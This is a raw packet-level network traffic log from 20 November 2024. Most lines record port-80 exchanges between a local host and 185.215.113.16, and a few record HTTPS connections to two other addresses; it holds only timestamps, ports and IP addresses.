                                                                                                                                                                                                Nov 20, 2024 10:54:34.929864883 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929910898 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929963112 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.929989100 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930046082 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930066109 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930093050 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930109024 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930123091 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930139065 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930139065 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930162907 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930192947 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930242062 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930279970 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930294991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930319071 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930325031 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930335999 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930408001 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930416107 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930423975 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930442095 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930465937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930485964 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930491924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930502892 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930505991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930521965 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930538893 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930552006 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930568933 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930574894 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930584908 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930593967 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.930617094 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932126999 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932152033 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932193041 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932221889 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932236910 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932252884 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932267904 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932271004 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932291031 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932295084 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932311058 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932329893 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932337046 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932346106 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932373047 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932404995 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932429075 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932446957 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932446957 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932465076 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932482004 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932490110 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932543039 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932544947 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932560921 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932575941 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932589054 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932605982 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932614088 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932629108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932637930 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932646990 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932661057 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932688951 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.932708025 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959644079 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959659100 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959672928 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959706068 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959728003 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959752083 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959767103 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959769011 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959781885 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959799051 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959810972 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.959837914 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.961405039 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.961433887 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.961447954 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.961478949 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.961482048 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.961494923 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.961513042 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.961520910 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.961529016 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.961568117 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963660002 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963673115 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963686943 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963701963 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963710070 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963717937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963732958 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963733912 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963751078 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963761091 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.963793039 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964694977 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964723110 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964739084 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964764118 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964808941 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964824915 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964840889 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964849949 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964855909 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964873075 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964880943 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.964907885 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.967330933 CET49816443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:54:35.002187014 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.009803057 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.009819984 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.009835958 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.009876966 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.009963036 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.009978056 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.009993076 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010009050 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010031939 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010046005 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010046005 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010046959 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010062933 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010077953 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010083914 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010094881 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010101080 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010113001 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010128975 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010135889 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010143995 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010159969 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010174036 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010200977 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010289907 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010304928 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010320902 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010337114 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010344028 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.010382891 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.011416912 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.018419981 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.018435955 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.018451929 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.018465996 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.018481970 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.018501997 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.018503904 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.018513918 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.018522024 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.018575907 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019817114 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019831896 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019850016 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019886971 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019906998 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019922018 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019922972 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019939899 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019956112 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019967079 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.019970894 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020042896 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020595074 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020648956 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020664930 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020678997 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020682096 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020695925 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020710945 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020715952 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020729065 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020730972 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020744085 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020771027 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.020979881 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021006107 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021023035 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021035910 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021048069 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021063089 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021069050 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021079063 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021095991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021117926 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021130085 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021318913 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021416903 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021430016 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021456957 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021457911 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021473885 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021488905 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021502972 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021513939 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021528006 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021528006 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021547079 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021560907 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021569014 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021578074 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021593094 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021609068 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021610975 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021648884 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021684885 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021701097 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.021743059 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023231030 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023243904 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023258924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023274899 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023298979 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023298979 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023298979 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023345947 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023367882 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023384094 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023397923 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023415089 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023427963 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023442984 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023466110 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023488045 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023504019 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023518085 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023576975 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023612976 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023614883 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023637056 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023653984 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023654938 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023670912 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023686886 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023694992 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023705006 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023722887 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023727894 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023736954 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.023761988 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.038357973 CET4434981913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.046300888 CET49819443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.046331882 CET4434981913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.046969891 CET49819443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:35.046977043 CET4434981913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052428007 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052443981 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052458048 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052495003 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052524090 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052602053 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052618027 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052634001 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052649975 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052659988 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052686930 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.052689075 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054313898 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054328918 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054352045 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054359913 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054403067 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054486990 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054502010 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054517984 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054532051 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054541111 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.054582119 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056658983 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056674957 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056690931 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056704044 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056720972 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056726933 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056735992 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056751966 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056763887 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056766987 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056792021 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:35.056817055 CET4981280192.168.2.7185.215.113.16
